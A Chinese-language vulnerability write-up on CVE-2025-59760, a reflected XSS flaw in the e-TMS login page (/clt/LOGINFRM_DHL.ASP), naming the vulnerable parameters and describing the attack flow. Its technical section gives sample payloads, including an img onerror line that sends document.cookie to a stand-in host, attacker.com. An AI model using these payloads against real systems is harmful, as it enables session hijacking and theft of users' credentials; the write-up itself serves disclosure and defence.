CVE-2025-59760CVE-2025-59760是AndSoft公司开发的e-TMS(运输管理系统)v25.03版本中存在的一个反射型跨站脚本(XSS)漏洞。该漏洞于2025年10月2日由西班牙国家网络安全研究所(INCIBE)披露,CVSS 3.1评分为6.1分,属于中危级别。
e-TMS是AndSoft公司推出的一款广泛应用于物流和运输行业的运输管理系统,用于管理运输订单、车辆调度、物流跟踪等业务。该系统在企业供应链管理中扮演重要角色,因此其安全性直接关系到企业业务数据的保密性和完整性。
该漏洞存在于e-TMS的登录页面(/clt/LOGINFRM_DHL.ASP)中,具体涉及'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'等多个参数。攻击者可以通过构造包含恶意JavaScript代码的URL,诱使受害者点击该链接,从而在受害者的浏览器中执行任意JavaScript代码。由于该漏洞为反射型XSS,需要用户交互才能触发,攻击者通常需要通过钓鱼邮件、即时消息或其他社交工程手段诱导用户访问恶意链接。
成功利用此漏洞后,攻击者可以在受害者的浏览器上下文中执行任意脚本,可能导致会话劫持、敏感信息窃取、钓鱼攻击进一步升级,或在特定情况下利用受害者的权限执行未授权操作。尽管该漏洞的CVSS评分显示其对系统机密性和完整性影响为低,但考虑到e-TMS系统通常处理敏感的物流和运输数据,其潜在风险不容忽视。
该漏洞是一个典型的反射型跨站脚本(Reflected XSS)漏洞,其根本原因在于e-TMS v25.03的登录页面(/clt/LOGINFRM_DHL.ASP)对用户输入的参数缺乏充分的过滤和转义处理。
技术原理:
1. 漏洞存在于路径'/clt/LOGINFRM_DHL.ASP'中,该页面是DHL集成的登录表单页面。
2. 涉及的易受攻击参数包括:'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'。
3. 当用户访问包含恶意构造参数的URL时,服务器将这些参数的值未经适当的HTML编码或JavaScript转义处理,直接反射回响应页面中。
4. 攻击者可以在这些参数中注入恶意的JavaScript代码,例如:<script>alert(document.cookie)</script> 或更复杂的payload如 <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>。
利用方式:
1. 攻击者首先构造一个包含恶意JavaScript代码的特制URL,目标参数为上述六个参数之一。
2. 攻击者通过钓鱼邮件、社交媒体或其他方式将恶意URL发送给目标用户。
3. 受害者点击该链接后,浏览器向e-TMS服务器发起请求,服务器将恶意代码作为响应的一部分返回。
4. 浏览器解析响应时,执行了嵌入在页面中的恶意JavaScript代码。
5. 恶意代码在受害者的浏览器上下文中执行,可以窃取会话cookie、重定向用户到钓鱼页面、修改页面内容或执行其他恶意操作。
由于漏洞利用无需认证(PR:N),但需要用户交互(UI:R),且影响范围为变更(Scope Changed),表明该漏洞可能影响到浏览器安全上下文之外的组件或资源。